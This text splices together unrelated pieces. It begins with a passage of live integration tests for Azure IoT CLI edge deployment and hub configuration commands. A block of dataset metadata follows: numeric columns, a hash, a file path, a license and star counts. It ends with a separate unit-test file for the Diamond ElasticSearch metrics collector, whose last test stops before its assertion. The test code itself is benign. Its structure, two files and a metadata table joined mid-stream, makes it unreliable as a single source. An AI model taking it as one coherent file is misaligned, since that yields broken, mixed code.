                        ],
                    ),
                    self.check(
                        "metrics.queries",
                        json.loads(self.kwargs["generic_metrics"])["metrics"]["queries"],
                    ),
                ],
            )

            # Content inline - Edge v1 format
            self.cmd(
                self.set_cmd_auth_type(
                    """iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
                    --target-condition \"{}\" --labels '{}' --content '{}' --metrics '{}'""".format(
                        config_ids[3],
                        LIVE_HUB,
                        LIVE_RG,
                        priority,
                        condition,
                        "{labels}",
                        "{edge_content_v1}",
                        "{generic_metrics}",
                    ),
                    auth_type=auth_phase,
                ),
                checks=[
                    self.check("id", config_ids[3]),
                    self.check("priority", priority),
                    self.check("targetCondition", condition),
                    self.check("labels", json.loads(self.kwargs["labels"])),
                    self.check(
                        "content.modulesContent",
                        # v1 payloads use the singular 'moduleContent' key.
                        json.loads(self.kwargs["edge_content_v1"])["content"][
                            "moduleContent"
                        ],
                    ),
                    self.check(
                        "metrics.queries",
                        json.loads(self.kwargs["generic_metrics"])["metrics"]["queries"],
                    ),
                ],
            )

            # Error schema validation - Malformed deployment content causes validation error
            self.cmd(
                self.set_cmd_auth_type(
                    """iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
                    --target-condition \"{}\" --labels '{}' --content '{}'""".format(
                        config_ids[1],
                        LIVE_HUB,
                        LIVE_RG,
                        priority,
                        condition,
                        "{labels}",
                        "{edge_content_malformed}",
                    ),
                    auth_type=auth_phase
                ),
                expect_failure=True,
            )

            # Error schema validation - Layered deployment without flag causes validation error
            self.cmd(
                self.set_cmd_auth_type(
                    """iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
                    --target-condition \"{}\" --labels '{}' --content '{}'""".format(
                        config_ids[1],
                        LIVE_HUB,
                        LIVE_RG,
                        priority,
                        condition,
                        "{labels}",
                        "{edge_content_layered}",
                    ),
                    auth_type=auth_phase
                ),
                expect_failure=True,
            )

            # Uses IoT Edge hub schema version 1.1
            self.cmd(
                self.set_cmd_auth_type(
                    """iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
                    --target-condition \"{}\" --labels '{}' --content '{}'""".format(
                        config_ids[4],
                        LIVE_HUB,
                        LIVE_RG,
                        priority,
                        condition,
                        "{labels}",
                        edge_content_v11_path,
                    ),
                    auth_type=auth_phase,
                ),
                checks=[
                    self.check("id", config_ids[4]),
                    self.check("priority", priority),
                    self.check("targetCondition", condition),
                    self.check("labels", json.loads(self.kwargs["labels"])),
                    self.check(
                        "content.modulesContent",
                        json.loads(read_file_content(edge_content_v11_path))["modulesContent"],
                    ),
                    self.check("metrics.queries", {}),
                ],
            )

            # Show deployment
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment show --deployment-id {} --hub-name {} --resource-group {}".format(
                        config_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase,
                ),
                checks=[
                    self.check("id", config_ids[0]),
                    self.check("priority", priority),
                    self.check("targetCondition", condition),
                    self.check("labels", json.loads(self.kwargs["labels"])),
                ],
            )

            # Update deployment
            new_priority = random.randint(1, 10)
            new_condition = "tags.building=43 and tags.environment='dev'"
            self.kwargs["new_labels"] = '{"key": "super_value"}'
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment update -d {} -n {} -g {} --set priority={} targetCondition=\"{}\" labels='{}'".format(
                        config_ids[0],
                        LIVE_HUB,
                        LIVE_RG,
                        new_priority,
                        new_condition,
                        "{new_labels}",
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("id", config_ids[0]),
                    self.check("priority", new_priority),
                    self.check("targetCondition", new_condition),
                    self.check("labels", json.loads(self.kwargs["new_labels"])),
                ],
            )

            # Evaluate metrics of a deployment
            user_metric_name = "mymetric"
            system_metric_name = "appliedCount"
            config_output = self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment show --deployment-id {} -n {} -g {}".format(
                        config_ids[1],
                        LIVE_HUB,
                        LIVE_RG
                    ),
                    auth_type=auth_phase
                )
            ).get_output_in_json()

            # Default metric type is user
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment show-metric --metric-id {} --deployment-id {} --hub-name {}".format(
                        user_metric_name, config_ids[1], LIVE_HUB
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("metric", user_metric_name),
                    self.check(
                        "query", config_output["metrics"]["queries"][user_metric_name]
                    ),
                ],
            )

            # System metric
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment show-metric --metric-id {} --deployment-id {} --metric-type {} -n {} -g {}".format(
                        system_metric_name, config_ids[1], "system", LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("metric", system_metric_name),
                    self.check(
                        "query",
                        config_output["systemMetrics"]["queries"][system_metric_name],
                    ),
                ],
            )

            # Error - metric does not exist
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment show-metric -m {} -d {} -n {} -g {}".format(
                        "doesnotexist", config_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase
                ),
                expect_failure=True,
            )

            # All five created deployments must be present in the listing.
            config_list_check = [
                self.check("length([*])", config_count),
                self.exists("[?id=='{}']".format(config_ids[0])),
                self.exists("[?id=='{}']".format(config_ids[1])),
                self.exists("[?id=='{}']".format(config_ids[2])),
                self.exists("[?id=='{}']".format(config_ids[3])),
                self.exists("[?id=='{}']".format(config_ids[4])),
            ]

            # List all edge deployments
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment list -n {} -g {}".format(LIVE_HUB, LIVE_RG),
                    auth_type=auth_phase
                ),
                checks=config_list_check,
            )

            # Explicitly delete an edge deployment
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment delete -d {} -n {} -g {}".format(
                        config_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase
                )
            )

            # Validate deletion
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment show -d {} -n {} -g {}".format(
                        config_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase
                ),
                expect_failure=True
            )

            # Clean remaining deployments so the next auth phase starts fresh.
            self.tearDown()
class TestIoTHubConfigurations(IoTLiveScenarioTest):
    """Live tests for ADM 'iot hub configuration' commands."""

    def __init__(self, test_case):
        super(TestIoTHubConfigurations, self).__init__(
            test_case, LIVE_HUB, LIVE_RG
        )

    def test_device_configurations(self):
        """Create device/module configurations (inline and from file),
        show, update, evaluate metrics, list and delete; invalid content
        and target conditions must fail. Repeated per dataplane auth type.

        Fix: removed a dead duplicate assignment of ``module_condition``
        before the invalid-target-condition case — the command it
        preceded never used it.
        """
        config_count = 3
        config_ids = self.generate_config_names(config_count)
        edge_config_ids = self.generate_config_names(1, True)

        self.kwargs["generic_metrics"] = read_file_content(generic_metrics_path)
        self.kwargs["adm_content_device"] = read_file_content(adm_content_device_path)
        self.kwargs["adm_content_module"] = read_file_content(adm_content_module_path)
        self.kwargs["edge_content"] = read_file_content(edge_content_path)
        self.kwargs["labels"] = '{"key0": "value0"}'

        priority = random.randint(1, 10)
        condition = "tags.building=9 and tags.environment='test'"

        for auth_phase in DATAPLANE_AUTH_TYPES:
            # Device content inline
            # Note: $schema is included as a nested property in the sample content.
            self.cmd(
                self.set_cmd_auth_type(
                    """iot hub configuration create --config-id {} --hub-name {} --resource-group {} --priority {}
                    --target-condition \"{}\" --labels '{}' --content '{}'""".format(
                        config_ids[0],
                        LIVE_HUB,
                        LIVE_RG,
                        priority,
                        condition,
                        "{labels}",
                        "{adm_content_device}",
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("id", config_ids[0]),
                    self.check("priority", priority),
                    self.check("targetCondition", condition),
                    self.check("labels", json.loads(self.kwargs["labels"])),
                    self.check(
                        "content.deviceContent",
                        json.loads(self.kwargs["adm_content_device"])["content"][
                            "deviceContent"
                        ],
                    ),
                    self.check("metrics.queries", {}),
                ],
            )

            # Module content + metrics from file.
            # Configurations must be lowercase and will be lower()'ed.
            # Note: $schema is included as a nested property in the sample content.
            module_condition = "{} {}".format("FROM devices.modules WHERE", condition)
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration create -c {} --pri {} --tc \"{}\" --lab '{}' -k '{}' -m '{}' -n {} -g {}".format(
                        config_ids[1].upper(),
                        priority,
                        module_condition,
                        "{labels}",
                        adm_content_module_path,
                        adm_content_module_path,
                        LIVE_HUB,
                        LIVE_RG
                    ),
                    auth_type=auth_phase,
                ),
                checks=[
                    self.check("id", config_ids[1].lower()),
                    self.check("priority", priority),
                    self.check("targetCondition", module_condition),
                    self.check("labels", json.loads(self.kwargs["labels"])),
                    self.check(
                        "content.moduleContent",
                        json.loads(self.kwargs["adm_content_module"])["content"][
                            "moduleContent"
                        ],
                    ),
                    self.check(
                        "metrics.queries",
                        json.loads(self.kwargs["adm_content_module"])["metrics"]["queries"],
                    ),
                ],
            )

            # Device content + metrics from file.
            # Configurations must be lowercase and will be lower()'ed.
            # No labels, target-condition or priority
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration create -c {} -k '{}' --metrics '{}' -n {} -g {}".format(
                        config_ids[2].upper(),
                        adm_content_device_path,
                        generic_metrics_path,
                        LIVE_HUB,
                        LIVE_RG
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("id", config_ids[2].lower()),
                    self.check("priority", 0),
                    self.check("targetCondition", ""),
                    self.check("labels", None),
                    self.check(
                        "content.deviceContent",
                        json.loads(self.kwargs["adm_content_device"])["content"][
                            "deviceContent"
                        ],
                    ),
                    self.check(
                        "metrics.queries",
                        json.loads(self.kwargs["generic_metrics"])["metrics"]["queries"],
                    ),
                ],
            )

            # Error validation - Malformed configuration content causes validation error
            # In this case we attempt to use an edge deployment ^_^
            self.cmd(
                self.set_cmd_auth_type(
                    """iot hub configuration create --config-id {} --hub-name {} --resource-group {} --priority {}
                    --target-condition \"{}\" --labels '{}' --content '{}'""".format(
                        config_ids[1],
                        LIVE_HUB,
                        LIVE_RG,
                        priority,
                        condition,
                        "{labels}",
                        "{edge_content}",
                    ),
                    auth_type=auth_phase
                ),
                expect_failure=True,
            )

            # Error validation - Module configuration target condition must start with 'from devices.modules where'
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration create -c {} -k '{}' -n {} -g {}".format(
                        config_ids[1].upper(),
                        adm_content_module_path,
                        LIVE_HUB,
                        LIVE_RG
                    ),
                    auth_type=auth_phase
                ),
                expect_failure=True,
            )

            # Show ADM configuration
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration show --config-id {} --hub-name {} --resource-group {}".format(
                        config_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("id", config_ids[0]),
                    self.check("priority", priority),
                    self.check("targetCondition", condition),
                    self.check("labels", json.loads(self.kwargs["labels"])),
                ],
            )

            # Update deployment
            new_priority = random.randint(1, 10)
            new_condition = "tags.building=43 and tags.environment='dev'"
            self.kwargs["new_labels"] = '{"key": "super_value"}'
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration update -c {} -n {} -g {} --set priority={} targetCondition=\"{}\" labels='{}'".format(
                        config_ids[0],
                        LIVE_HUB,
                        LIVE_RG,
                        new_priority,
                        new_condition,
                        "{new_labels}",
                    ),
                    auth_type=auth_phase,
                ),
                checks=[
                    self.check("id", config_ids[0]),
                    self.check("priority", new_priority),
                    self.check("targetCondition", new_condition),
                    self.check("labels", json.loads(self.kwargs["new_labels"])),
                ],
            )

            # Evaluate metrics of a deployment
            user_metric_name = "mymetric"
            system_metric_name = "appliedCount"
            config_output = self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration show --config-id {} -n {} -g {}".format(
                        config_ids[1], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase,
                )
            ).get_output_in_json()

            # Default metric type is user
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration show-metric --metric-id {} --config-id {} --hub-name {}".format(
                        user_metric_name, config_ids[1], LIVE_HUB
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("metric", user_metric_name),
                    self.check(
                        "query", config_output["metrics"]["queries"][user_metric_name]
                    ),
                ],
            )

            # System metric
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration show-metric --metric-id {} --config-id {} --metric-type {} -n {} -g {}".format(
                        system_metric_name, config_ids[1], "system", LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase,
                ),
                checks=[
                    self.check("metric", system_metric_name),
                    self.check(
                        "query",
                        config_output["systemMetrics"]["queries"][system_metric_name],
                    ),
                ],
            )

            # Error - metric does not exist, using connection string
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration show-metric -m {} -c {} -n {} -g {}".format(
                        "doesnotexist", config_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase,
                ),
                expect_failure=True,
            )

            # Create Edge deployment to ensure it doesn't show up on ADM list
            self.cmd(
                self.set_cmd_auth_type(
                    """iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --content '{}'""".format(
                        edge_config_ids[0],
                        LIVE_HUB,
                        LIVE_RG,
                        "{edge_content}",
                    ),
                    auth_type=auth_phase
                )
            )

            config_list_check = [
                self.check("length([*])", config_count),
                self.exists("[?id=='{}']".format(config_ids[0])),
                self.exists("[?id=='{}']".format(config_ids[1])),
                self.exists("[?id=='{}']".format(config_ids[2]))
            ]

            # List all ADM configurations
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration list -n {} -g {}".format(LIVE_HUB, LIVE_RG),
                    auth_type=auth_phase
                ),
                checks=config_list_check,
            )

            # Explicitly delete an ADM configuration
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration delete -c {} -n {} -g {}".format(
                        config_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase
                )
            )

            # Validate deletion
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub configuration show -c {} -n {} -g {}".format(
                        config_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=auth_phase,
                ),
                expect_failure=True
            )

            # Clean remaining configurations so the next auth phase starts fresh.
            self.tearDown()
| 41
| 129
| 0.443193
| 2,620
| 30,709
| 4.924427
| 0.079771
| 0.053015
| 0.030693
| 0.036273
| 0.857076
| 0.824911
| 0.812045
| 0.778871
| 0.73849
| 0.727562
| 0
| 0.005915
| 0.444007
| 30,709
| 748
| 130
| 41.054813
| 0.749736
| 0.070077
| 0
| 0.77044
| 0
| 0.007862
| 0.153906
| 0.020935
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009434
| false
| 0
| 0.011006
| 0
| 0.025157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
814114d197feb276d63cccb1fd0d1d82d501fed1
| 17,567
|
py
|
Python
|
src/collectors/elasticsearch/test/testelasticsearch.py
|
hermdog/Diamond
|
0f3eb04327d6d3ed5e53a9967d6c9d2c09714a47
|
[
"MIT"
] | 1,795
|
2015-01-05T11:14:55.000Z
|
2022-03-25T12:07:15.000Z
|
src/collectors/elasticsearch/test/testelasticsearch.py
|
hermdog/Diamond
|
0f3eb04327d6d3ed5e53a9967d6c9d2c09714a47
|
[
"MIT"
] | 671
|
2015-01-02T05:57:27.000Z
|
2022-03-29T22:39:05.000Z
|
src/collectors/elasticsearch/test/testelasticsearch.py
|
hermdog/Diamond
|
0f3eb04327d6d3ed5e53a9967d6c9d2c09714a47
|
[
"MIT"
] | 793
|
2015-01-03T01:39:02.000Z
|
2022-02-18T05:12:27.000Z
|
#!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from elasticsearch import ElasticSearchCollector
##########################################################################
class TestElasticSearchCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('ElasticSearchCollector', {})
self.collector = ElasticSearchCollector(config, None)
def test_import(self):
self.assertTrue(ElasticSearchCollector)
def test_new__instances_default(self):
config = get_collector_config('ElasticSearchCollector', {})
self.collector = ElasticSearchCollector(config, None)
self.assertEqual(self.collector.instances, {'': ('127.0.0.1', 9200)})
def test_new__instances_single(self):
config = get_collector_config('ElasticSearchCollector', {
'instances': 'bla'})
self.collector = ElasticSearchCollector(config, None)
self.assertEqual(self.collector.instances, {'default': ('bla', 9200)})
def test_new__instances_multi(self):
config = get_collector_config('ElasticSearchCollector', {
'instances': [
'something',
'foo@1234',
'bar@bla:1234',
]})
self.collector = ElasticSearchCollector(config, None)
self.assertEqual(self.collector.instances, {
'default': ('something', 9200),
'foo': ('1234', 9200),
'bar': ('bla', 1234),
})
    @patch.object(Collector, 'publish')
    def test_should_work_with_real_data_and_basic_auth(self, publish_mock):
        # Re-run the full fixture flow with HTTP basic-auth credentials set
        # on the collector config. The delegated test carries its own
        # @patch decorator, so publish_mock here is unused by design.
        self.collector.config["user"] = "user"
        self.collector.config["password"] = "password"
        self.test_should_work_with_real_data()
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
returns = [
self.getFixture('stats'),
self.getFixture('cluster_stats'),
self.getFixture('indices_stats'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
self.collector.config['cluster'] = True
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 3)
metrics = {
'http.current': 1,
'indices.docs.count': 11968062,
'indices.docs.deleted': 2692068,
'indices.datastore.size': 22724243633,
'indices._all.docs.count': 4,
'indices._all.docs.deleted': 0,
'indices._all.datastore.size': 2674,
'indices.test.docs.count': 4,
'indices.test.docs.deleted': 0,
'indices.test.datastore.size': 2674,
'process.cpu.percent': 58,
'process.mem.resident': 5192126464,
'process.mem.share': 11075584,
'process.mem.virtual': 7109668864,
'disk.reads.count': 55996,
'disk.reads.size': 1235387392,
'disk.writes.count': 5808198,
'disk.writes.size': 23287275520,
'thread_pool.generic.threads': 1,
'network.tcp.active_opens': 2299,
'jvm.mem.pools.CMS_Old_Gen.used': 530915016,
'cluster_health.nodes.total': 3,
'cluster_health.nodes.data': 3,
'cluster_health.shards.active_primary': 5,
'cluster_health.shards.active': 10,
'cluster_health.shards.relocating': 0,
'cluster_health.shards.unassigned': 0,
'cluster_health.shards.initializing': 0,
'cluster_health.status': 2,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_data_v2(self, publish_mock):
returns = [
self.getFixture('stats'),
self.getFixture('cluster_stats_v2'),
self.getFixture('indices_stats'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
self.collector.config['cluster'] = True
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 3)
metrics = {
'http.current': 1,
'indices.docs.count': 11968062,
'indices.docs.deleted': 2692068,
'indices.datastore.size': 22724243633,
'indices._all.docs.count': 4,
'indices._all.docs.deleted': 0,
'indices._all.datastore.size': 2674,
'indices.test.docs.count': 4,
'indices.test.docs.deleted': 0,
'indices.test.datastore.size': 2674,
'process.cpu.percent': 58,
'process.mem.resident': 5192126464,
'process.mem.share': 11075584,
'process.mem.virtual': 7109668864,
'disk.reads.count': 55996,
'disk.reads.size': 1235387392,
'disk.writes.count': 5808198,
'disk.writes.size': 23287275520,
'thread_pool.generic.threads': 1,
'network.tcp.active_opens': 2299,
'jvm.mem.pools.CMS_Old_Gen.used': 530915016,
'cluster_health.nodes.pending_tasks': 266,
'cluster_health.nodes.data': 4,
'cluster_health.nodes.total': 8,
'cluster_health.shards.active_primary': 10,
'cluster_health.shards.active': 30,
'cluster_health.shards.active_percent': 100,
'cluster_health.shards.delayed_unassigned': 0,
'cluster_health.shards.relocating': 0,
'cluster_health.shards.unassigned': 0,
'cluster_health.shards.initializing': 0,
'cluster_health.status': 2,
}
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_data_logstash_mode(self, publish_mock):
    """Collect with logstash_mode enabled and verify per-index-group metrics.

    Two HTTP responses are mocked (node stats, logstash-style index stats);
    logstash_mode should aggregate dated indices into an index group.
    """
    # Fixture responses are popped in order, one per urlopen() call.
    returns = [
        self.getFixture('stats'),
        self.getFixture('logstash_indices_stats'),
    ]
    urlopen_mock = patch('urllib2.urlopen', Mock(
        side_effect=lambda *args: returns.pop(0)))
    self.collector.config['logstash_mode'] = True
    urlopen_mock.start()
    self.collector.collect()
    urlopen_mock.stop()
    # check how many fixtures were consumed
    self.assertEqual(urlopen_mock.new.call_count, 2)
    # Omit all non-indices metrics, since those were already
    # checked in previous test.
    metrics = {
        'indices.docs.count': 11968062,
        'indices.docs.deleted': 2692068,
        'indices.datastore.size': 22724243633,
        'indices._all.docs.count': 35856619,
        'indices._all.docs.deleted': 0,
        'indices._all.datastore.size': 21903813340,
        'indices._all.get.exists_time_in_millis': 0,
        'indices._all.get.exists_total': 0,
        'indices._all.get.missing_time_in_millis': 0,
        'indices._all.get.missing_total': 0,
        'indices._all.get.time_in_millis': 0,
        'indices._all.get.total': 0,
        'indices._all.indexing.delete_time_in_millis': 0,
        'indices._all.indexing.delete_total': 0,
        'indices._all.indexing.index_time_in_millis': 29251475,
        'indices._all.indexing.index_total': 35189321,
        'indices._all.search.fetch_time_in_millis': 6962,
        'indices._all.search.fetch_total': 4084,
        'indices._all.search.query_time_in_millis': 41211,
        'indices._all.search.query_total': 4266,
        'indices._all.store.throttle_time_in_millis': 0,
        'indices.logstash-adm-syslog.indexes_in_group': 3,
        'indices.logstash-adm-syslog.datastore.size': 21903813340,
        'indices.logstash-adm-syslog.docs.count': 35856619,
        'indices.logstash-adm-syslog.docs.deleted': 0,
        'indices.logstash-adm-syslog.get.exists_time_in_millis': 0,
        'indices.logstash-adm-syslog.get.exists_total': 0,
        'indices.logstash-adm-syslog.get.missing_time_in_millis': 0,
        'indices.logstash-adm-syslog.get.missing_total': 0,
        'indices.logstash-adm-syslog.get.time_in_millis': 0,
        'indices.logstash-adm-syslog.get.total': 0,
        'indices.logstash-adm-syslog.indexing.delete_time_in_millis': 0,
        'indices.logstash-adm-syslog.indexing.delete_total': 0,
        'indices.logstash-adm-syslog.indexing.index_time_in_millis': 29251475,  # NOQA
        'indices.logstash-adm-syslog.indexing.index_total': 35189321,
        'indices.logstash-adm-syslog.search.fetch_time_in_millis': 6962,
        'indices.logstash-adm-syslog.search.fetch_total': 4084,
        'indices.logstash-adm-syslog.search.query_time_in_millis': 41211,
        'indices.logstash-adm-syslog.search.query_total': 4266,
        'indices.logstash-adm-syslog.store.throttle_time_in_millis': 0,
    }
    self.setDocExample(collector=self.collector.__class__.__name__,
                       metrics=metrics,
                       defaultpath=self.collector.config['path'])
    self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_data_logstash_hourlymode(self, publish_mock):
    """Collect with logstash_mode against hourly-rotated index fixtures.

    Same expectations as the daily logstash test, but the index-stats
    fixture uses hourly index names; grouping must produce identical
    aggregated metrics.
    """
    # Fixture responses are popped in order, one per urlopen() call.
    returns = [
        self.getFixture('stats'),
        self.getFixture('logstash_hourly_indices_stats'),
    ]
    urlopen_mock = patch('urllib2.urlopen', Mock(
        side_effect=lambda *args: returns.pop(0)))
    self.collector.config['logstash_mode'] = True
    urlopen_mock.start()
    self.collector.collect()
    urlopen_mock.stop()
    # check how many fixtures were consumed
    self.assertEqual(urlopen_mock.new.call_count, 2)
    # Omit all non-indices metrics, since those were already
    # checked in previous test.
    metrics = {
        'indices.docs.count': 11968062,
        'indices.docs.deleted': 2692068,
        'indices.datastore.size': 22724243633,
        'indices._all.docs.count': 35856619,
        'indices._all.docs.deleted': 0,
        'indices._all.datastore.size': 21903813340,
        'indices._all.get.exists_time_in_millis': 0,
        'indices._all.get.exists_total': 0,
        'indices._all.get.missing_time_in_millis': 0,
        'indices._all.get.missing_total': 0,
        'indices._all.get.time_in_millis': 0,
        'indices._all.get.total': 0,
        'indices._all.indexing.delete_time_in_millis': 0,
        'indices._all.indexing.delete_total': 0,
        'indices._all.indexing.index_time_in_millis': 29251475,
        'indices._all.indexing.index_total': 35189321,
        'indices._all.search.fetch_time_in_millis': 6962,
        'indices._all.search.fetch_total': 4084,
        'indices._all.search.query_time_in_millis': 41211,
        'indices._all.search.query_total': 4266,
        'indices._all.store.throttle_time_in_millis': 0,
        'indices.logstash-adm-syslog.indexes_in_group': 3,
        'indices.logstash-adm-syslog.datastore.size': 21903813340,
        'indices.logstash-adm-syslog.docs.count': 35856619,
        'indices.logstash-adm-syslog.docs.deleted': 0,
        'indices.logstash-adm-syslog.get.exists_time_in_millis': 0,
        'indices.logstash-adm-syslog.get.exists_total': 0,
        'indices.logstash-adm-syslog.get.missing_time_in_millis': 0,
        'indices.logstash-adm-syslog.get.missing_total': 0,
        'indices.logstash-adm-syslog.get.time_in_millis': 0,
        'indices.logstash-adm-syslog.get.total': 0,
        'indices.logstash-adm-syslog.indexing.delete_time_in_millis': 0,
        'indices.logstash-adm-syslog.indexing.delete_total': 0,
        'indices.logstash-adm-syslog.indexing.index_time_in_millis': 29251475,  # NOQA
        'indices.logstash-adm-syslog.indexing.index_total': 35189321,
        'indices.logstash-adm-syslog.search.fetch_time_in_millis': 6962,
        'indices.logstash-adm-syslog.search.fetch_total': 4084,
        'indices.logstash-adm-syslog.search.query_time_in_millis': 41211,
        'indices.logstash-adm-syslog.search.query_total': 4266,
        'indices.logstash-adm-syslog.store.throttle_time_in_millis': 0,
    }
    self.setDocExample(collector=self.collector.__class__.__name__,
                       metrics=metrics,
                       defaultpath=self.collector.config['path'])
    self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_0_90_data(self, publish_mock):
    """Stats specific to ElasticSearch 0.90 are collected from its fixtures."""
    responses = [
        self.getFixture('stats0.90'),
        self.getFixture('indices_stats'),
    ]
    mocked_urlopen = Mock(side_effect=lambda *args: responses.pop(0))
    urlopen_patcher = patch('urllib2.urlopen', mocked_urlopen)
    urlopen_patcher.start()
    self.collector.collect()
    urlopen_patcher.stop()
    # Every fixture should have been fetched exactly once.
    self.assertEqual(mocked_urlopen.call_count, 2)
    # test some 0.90 specific stats
    metrics = {
        'cache.filter.size': 1700,
        'cache.filter.evictions': 9,
        'cache.id.size': 98,
        'fielddata.size': 1448,
        'fielddata.evictions': 12,
    }
    self.setDocExample(collector=self.collector.__class__.__name__,
                       metrics=metrics,
                       defaultpath=self.collector.config['path'])
    self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_fail_gracefully(self, publish_mock):
    """A blank stats payload must publish nothing rather than raise."""
    blank_response = Mock(return_value=self.getFixture('stats_blank'))
    urlopen_patcher = patch('urllib2.urlopen', blank_response)
    urlopen_patcher.start()
    self.collector.collect()
    urlopen_patcher.stop()
    self.assertPublishedMany(publish_mock, {})
@patch.object(Collector, 'publish')
def test_multi_instances_with_real_data(self, publish_mock):
    """Each configured instance is collected and published under its alias."""
    config = get_collector_config('ElasticSearchCollector', {
        'instances': [
            'esprodata01@10.10.10.201:9200',
            'esprodata02@10.10.10.202:9200',
        ]})
    self.collector = ElasticSearchCollector(config, None)
    self.assertEqual(len(self.collector.instances), 2)
    # Two fixtures per instance, consumed in order.
    responses = [
        self.getFixture('stats'),
        self.getFixture('indices_stats'),
        self.getFixture('stats2'),
        self.getFixture('indices_stats2'),
    ]
    mocked_urlopen = Mock(side_effect=lambda *args: responses.pop(0))
    urlopen_patcher = patch('urllib2.urlopen', mocked_urlopen)
    urlopen_patcher.start()
    self.collector.collect()
    urlopen_patcher.stop()
    # check how many fixtures were consumed
    self.assertEqual(mocked_urlopen.call_count, 4)
    metrics = {
        'esprodata01.http.current': 1,
        'esprodata02.http.current': 2,
        'esprodata01.indices.docs.count': 11968062,
        'esprodata02.indices.docs.count': 11968000,
        'esprodata01.thread_pool.generic.threads': 1,
        'esprodata02.thread_pool.generic.threads': 2,
        'esprodata01.jvm.mem.pools.Par_Survivor_Space.max': 8716288,
        'esprodata02.jvm.mem.pools.Par_Survivor_Space.max': 8710000,
        'esprodata01.indices._all.docs.count': 4,
        'esprodata02.indices._all.docs.count': 8,
    }
    self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_1_7_data(self, publish_mock):
    """Segment-level metrics introduced in ES 1.7 are collected."""
    responses = [
        self.getFixture('stats1.7'),
        self.getFixture('indices_stats'),
    ]
    mocked_urlopen = Mock(side_effect=lambda *args: responses.pop(0))
    urlopen_patcher = patch('urllib2.urlopen', mocked_urlopen)
    urlopen_patcher.start()
    self.collector.collect()
    urlopen_patcher.stop()
    # Both fixtures should have been fetched.
    self.assertEqual(mocked_urlopen.call_count, 2)
    # test some 1.7 specific stats
    metrics = {
        'segments.count': 7,
        'segments.mem.size': 75726,
        'segments.index_writer.mem.size': 0,
        'segments.index_writer.mem.max_size': 469762048,
        'segments.version_map.mem.size': 0,
        'segments.fixed_bit_set.mem.size': 0,
    }
    self.setDocExample(collector=self.collector.__class__.__name__,
                       metrics=metrics,
                       defaultpath=self.collector.config['path'])
